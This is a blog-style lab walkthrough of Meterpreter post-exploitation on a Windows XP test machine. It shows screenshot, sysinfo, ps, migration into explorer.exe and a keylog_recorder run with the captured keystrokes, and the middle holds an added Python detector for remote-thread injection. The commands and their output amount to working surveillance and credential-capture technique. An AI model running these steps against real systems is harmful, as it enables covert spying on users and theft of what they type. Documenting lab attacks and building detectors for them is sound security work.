Channel: Pax Pentest » Metasploit

Metasploit Meterpreter Shell: Screenshot, sysinfo, ps, migrate, keylog_recorder

This post follows on from a previous post in which the target machine was exploited and a Meterpreter shell obtained.

First to export an image of the target machine’s desktop:

meterpreter > screenshot
Screenshot saved to: /root/hikMIGNN.jpeg

And here’s the result:

[Image: hacked_desktop]

I must say seeing this was rather satisfying!

And now for system information:

meterpreter > sysinfo
Computer : LAB
OS : Windows XP (Build 2600, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32

Perfect.

Listing the processes:

meterpreter > ps

Process List
============

PID   PPID  Name                      Arch  Session     User                          Path
---   ----  ----                      ----  -------     ----                          ----
0     0     [System Process]                4294967295
4     0     System                    x86   0           NT AUTHORITY\SYSTEM
544   1032  svchost.exe               x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
572   1032  alg.exe                   x86   0           NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
596   1032  svchost.exe               x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
668   1032  inetinfo.exe

[...]

1820  1772  explorer.exe              x86   0           LAB\Lab1                      C:\WINDOWS\Explorer.EXE

Now to “migrate” to explorer.exe:

meterpreter > migrate 1820
[*] Migrating from 3740 to 1820...
[*] Migration completed successfully.
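
Seen from the defending side, the migration above shows up as a thread created inside explorer.exe by a different process. The following is an added example, not part of the original post: it assumes the host records Sysmon Event ID 8 (CreateRemoteThread) or an equivalent EDR event, and the watch list, the allowlist and the placeholder source paths are assumptions constructed for illustration.

```python
# Added example: flag remote thread creation into a user's shell process.
# Field names follow Sysmon Event ID 8; every record below is constructed.
import ntpath

WATCHED_TARGETS = {"explorer.exe", "winlogon.exe"}      # assumption: targets to watch
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe"}    # assumption: site allowlist

SAMPLE_EVENTS = [
    # PIDs 3740 -> 1820 come from the migrate output; the source path is a placeholder.
    r"""SourceProcessId: 3740
SourceImage: C:\PLACEHOLDER\exploited_service.exe
TargetProcessId: 1820
TargetImage: C:\WINDOWS\Explorer.EXE
StartModule: -""",
    r"""SourceProcessId: 600
SourceImage: C:\WINDOWS\system32\csrss.exe
TargetProcessId: 1820
TargetImage: C:\WINDOWS\Explorer.EXE
StartModule: C:\WINDOWS\system32\kernel32.dll""",
    r"""SourceProcessId: 2100
SourceImage: C:\PLACEHOLDER\updater.exe
TargetProcessId: 596
TargetImage: C:\WINDOWS\system32\svchost.exe
StartModule: -""",
]

def parse_event(text):
    """Turn the 'Key: Value' lines of one rendered event into a dict."""
    pairs = (line.partition(": ") for line in text.strip().splitlines())
    return {key.strip(): value.strip() for key, sep, value in pairs if sep}

def score_event(ev):
    """Return the reasons an event looks like injection; an empty list means no alert."""
    source = ev.get("SourceImage", "").lower()
    target = ntpath.basename(ev.get("TargetImage", "")).lower()
    if source in ALLOWED_SOURCES or target not in WATCHED_TARGETS:
        return []
    reasons = [f"remote thread into {target} (PID {ev.get('TargetProcessId')}) "
               f"from PID {ev.get('SourceProcessId')}"]
    # A start address outside every loaded module points at injected code.
    if ev.get("StartModule", "-") in ("", "-"):
        reasons.append("thread start address is not backed by a module")
    return reasons

def detect(events):
    return [(ev, why) for ev in map(parse_event, events) if (why := score_event(ev))]

if __name__ == "__main__":
    for ev, why in detect(SAMPLE_EVENTS):
        print(ev["SourceImage"], "->", ev["TargetImage"], why)
```

Only the first constructed record alerts; the allowlisted source and the unwatched svchost.exe target are skipped, which is where site-specific tuning belongs.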

Time for keystroke logging:

meterpreter > run post/windows/capture/keylog_recorder

[*] Executing module against LAB
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20130613112010_default_192.168.1.79_host.windows.key_330924.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt
[*] Stopping keystroke sniffer...

Whilst the keystroke logger was running I typed a few things on the target machine, and so in a new terminal, let’s see if the keystrokes have been logged:

:~# cat /root/.msf4/loot/20130613112010_default_192.168.1.79_host.windows.key_330924.txt
Keystroke log started at 2013-06-13 11:20:10 +0100
OK this search on Google is
to determine if the Metas
ploit keyy <Back> logger is wo
rking <Back> <Return> <Return> Is any of
this being typed in Notepad
being recorded on the attacki <Back>
ng machine? <Return> <Return> Don’t know yet
, but will find out in a min! <Return> <Return>

Success, every keystroke on the target machine has indeed been recorded on the attacking machine.

